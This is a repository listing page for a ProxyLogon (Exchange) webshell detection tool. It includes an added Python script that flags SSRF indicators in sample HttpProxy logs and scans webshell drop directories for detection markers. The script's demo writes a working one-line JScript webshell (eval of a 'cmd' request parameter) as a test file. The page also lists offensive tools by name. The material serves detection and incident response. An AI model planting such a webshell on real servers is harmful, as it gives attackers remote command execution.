Detect webshells dropped on Microsoft Exchange servers exploited through the "ProxyLogon" group of vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
★ 99 · Mar 16, 2021 · Updated 5 years ago
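The listing above only names the task. As an added illustration (not code from the exchange_webshell_detection repository or from any project on this page), the script below runs two of the publicly documented ProxyLogon indicators over constructed sample data so it works offline: the CVE-2021-26855 SSRF pattern in Exchange HttpProxy logs (an unauthenticated request whose AnchorMailbox is a `ServerInfo~<host>/<path>` back-end target) and the presence of `.aspx` files in the web-served directories where the webshells were dropped. The log field subset, the directory list, the indicator strings and the sample files are assumptions chosen for the demo; real HttpProxy logs carry many more columns and a real scan should also compare file hashes against the vendor's published list.

```python
"""Added example: two documented ProxyLogon indicators over constructed data.

  1. CVE-2021-26855 leaves HttpProxy log rows with an empty AuthenticatedUser
     and an AnchorMailbox of the form ServerInfo~<host>/<path>.
  2. The dropped webshells were .aspx files in a few web-served directories
     (owa\\auth, ecp\\auth, aspnet_client).

Field subset, paths, marker strings and sample content are assumptions.
"""
import csv
import tempfile
from pathlib import Path
from typing import Iterator

# Constructed HttpProxy-style log (real logs have many more columns). The
# '#Fields:' header is how Exchange names the columns; the parser relies on it.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Version: 15.01.0000.000
#Log-type: HttpProxy Logs
#Date: 2021-03-03T00:00:00.000Z
#Fields: DateTime,RequestId,ClientIpAddress,UrlStem,AnchorMailbox,AuthenticatedUser,HttpStatus
2021-03-03T01:02:03.000Z,1,10.0.0.5,/owa/,SMTP:alice@corp.example,CORP\\alice,200
2021-03-03T01:02:04.000Z,2,198.51.100.7,/ecp/y.js,ServerInfo~exch01.corp.example/ecp/DDI/DDIService.svc,,200
2021-03-03T01:02:05.000Z,3,198.51.100.7,/owa/auth/x.js,ServerInfo~localhost/autodiscover/autodiscover.xml,,200
2021-03-03T01:02:06.000Z,4,10.0.0.9,/ecp/,ServerInfo~exch01.corp.example/ecp/,CORP\\admin,200
"""


def parse_httpproxy_log(text: str) -> Iterator[dict]:
    """Yield one dict per data row, keyed by the names in the '#Fields:' line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#") or not line.strip():
            continue  # other directive lines and blanks
        if fields is None:
            raise ValueError("data row before #Fields: header")
        values = next(csv.reader([line]))
        yield dict(zip(fields, values))


def find_ssrf_requests(text: str) -> list[dict]:
    """Rows matching the CVE-2021-26855 indicator: no authenticated user AND
    an AnchorMailbox that names a back-end host and path (ServerInfo~*/*).
    Row 4 above has the ServerInfo~ anchor but is authenticated, so it is not flagged."""
    hits = []
    for row in parse_httpproxy_log(text):
        anchor = row.get("AnchorMailbox", "")
        if row.get("AuthenticatedUser", "") == "" and anchor.startswith("ServerInfo~") and "/" in anchor:
            hits.append(row)
    return hits


# Directories, relative to an Exchange install / inetpub root, where the
# ProxyLogon webshells were written (assumed layout for the demo).
WEBSHELL_DIRS = (
    Path("FrontEnd/HttpProxy/owa/auth"),
    Path("FrontEnd/HttpProxy/ecp/auth"),
    Path("inetpub/wwwroot/aspnet_client"),
)
# Content markers typical of one-line .NET shells; a heuristic, not a signature.
SHELL_MARKERS = ("eval(", "Request.Item[", "Request[", "System.Diagnostics.Process", "unsafe")


def scan_webshells(root: Path) -> list[dict]:
    """List every .aspx under the drop directories with the markers it contains.
    Any file here deserves review; markers only help triage, since a shell can
    be obfuscated and a stock page (e.g. logon.aspx) legitimately lives here."""
    findings = []
    for rel in WEBSHELL_DIRS:
        d = root / rel
        if not d.is_dir():
            continue
        for p in d.rglob("*.aspx"):
            try:
                body = p.read_text(errors="replace")
            except OSError:
                continue
            markers = [m for m in SHELL_MARKERS if m in body]
            findings.append({"name": p.name, "path": str(p), "size": p.stat().st_size, "markers": markers})
    return sorted(findings, key=lambda f: f["path"])


def build_demo_tree() -> Path:
    """Constructed Exchange-like tree: one benign page plus one shell-like file."""
    root = Path(tempfile.mkdtemp(prefix="exch_demo_"))
    auth = root / "FrontEnd/HttpProxy/owa/auth"
    auth.mkdir(parents=True)
    (auth / "logon.aspx").write_text('<%@ Page Language="C#" %><html>login form</html>')
    (auth / "help.aspx").write_text('<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>')
    return root


if __name__ == "__main__":
    for row in find_ssrf_requests(SAMPLE_HTTPPROXY_LOG):
        print("SSRF?", row["DateTime"], row["ClientIpAddress"], row["AnchorMailbox"])
    for f in scan_webshells(build_demo_tree()):
        print("ASPX ", f["path"], f["markers"] or "(no content markers)")
```

On a real server, point `scan_webshells` at the Exchange install root (and `inetpub` root) and feed `find_ssrf_requests` each file under `Logging\HttpProxy`; treat every SSRF hit's client address and every unexpected `.aspx` as the starting point for the incident timeline rather than as a verdict.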
Alternatives and similar repositories for exchange_webshell_detection
Users that are interested in exchange_webshell_detection are comparing it to the libraries listed below.
- 🔦🔬 A small PowerShell tool for finding information quickly on malicious IPs or FQDNs. PowerShell threat hunting. ★ 11 · Jan 9, 2020 · Updated 6 years ago
- A scanner to detect the use of stolen FireEye red team tools ★ 20 · Dec 18, 2020 · Updated 5 years ago
- KQL queries for Microsoft Defender Advanced Hunting organized around the TTPs of the MITRE ATT&CK framework. ★ 19 · Nov 7, 2024 · Updated last year
- A series of PowerShell scripts to automate collection of forensic artefacts in most Incident Response environments ★ 65 · Jan 31, 2022 · Updated 4 years ago
- Deletes old OWA and ECP versions from Exchange Server ★ 12 · Dec 7, 2021 · Updated 4 years ago
- Exploit and detect tools for CVE-2020-0688 ★ 356 · Mar 21, 2020 · Updated 6 years ago
- Detection Ideas & Rules repository. ★ 178 · Sep 10, 2021 · Updated 4 years ago
- CVE-2024-23897 jenkins-cli ★ 15 · Jan 27, 2024 · Updated 2 years ago
- Incident response scripts ★ 18 · Mar 4, 2019 · Updated 7 years ago
- Conti V3 source code updated ★ 11 · Jun 30, 2022 · Updated 3 years ago
- AntSword plugin for probing outbound network connectivity ★ 22 · Jul 6, 2022 · Updated 3 years ago
- Exchange Server support tools and scripts ★ 1,276 · Mar 17, 2026 · Updated 3 weeks ago
- A tool to find/download malware samples from various public repositories ★ 12 · Dec 22, 2021 · Updated 4 years ago
- C# POC code for the SessionEnv DLL hijack by utilizing called functions of TSMSISrv.dll ★ 62 · Apr 18, 2019 · Updated 6 years ago
- Malware similarity platform with modularity in mind. ★ 80 · Jul 18, 2021 · Updated 4 years ago
- Post-exploitation tool for configuration management servers. ★ 77 · Jan 29, 2026 · Updated 2 months ago
- C code to enable ETW tracing for .NET assemblies ★ 32 · Aug 12, 2022 · Updated 3 years ago
- A collection of tools adversaries commonly use in an attack. ★ 15 · Nov 23, 2024 · Updated last year
- Mitigation validation utility for the Ivanti Connect Secure attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887. ★ 12 · Feb 3, 2024 · Updated 2 years ago
- Registry-hijacking-based BypassUAC ★ 28 · Dec 16, 2020 · Updated 5 years ago
- DeepToad is a library and a tool to cluster similar files using fuzzy hashing ★ 20 · Apr 5, 2020 · Updated 6 years ago
- Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in… ★ 270 · Mar 18, 2021 · Updated 5 years ago
- Dump stuff without touching disk ★ 165 · Oct 29, 2020 · Updated 5 years ago
- Simple YARA rule manager ★ 67 · Dec 27, 2022 · Updated 3 years ago
- Rewrite of AChoir in Go for cross-platform forensic artifact collection and processing ★ 41 · Feb 28, 2026 · Updated last month
- Invoke-Forensics provides PowerShell commands to simplify working with the forensic tools KAPE and RegRipper. ★ 118 · Nov 28, 2023 · Updated 2 years ago
- DFIRTrack - The Incident Response Tracking Application ★ 534 · Jan 13, 2026 · Updated 2 months ago
- Collect-MemoryDump - Automated Creation of Windows Memory Snapshots for DFIR ★ 255 · Oct 29, 2025 · Updated 5 months ago
- Ansible scripts to build an attack box ★ 24 · Sep 24, 2018 · Updated 7 years ago
- Collection of videos of raids on cybercriminals ★ 22 · Mar 19, 2025 · Updated last year
- Convert Empire profiles to Apache mod_rewrite scripts ★ 29 · Sep 17, 2019 · Updated 6 years ago
- Explore Indicators of Compromise automatically ★ 97 · Feb 27, 2020 · Updated 6 years ago
- Mole is a framework for identifying and exploiting out-of-band application vulnerabilities. ★ 58 · Aug 6, 2020 · Updated 5 years ago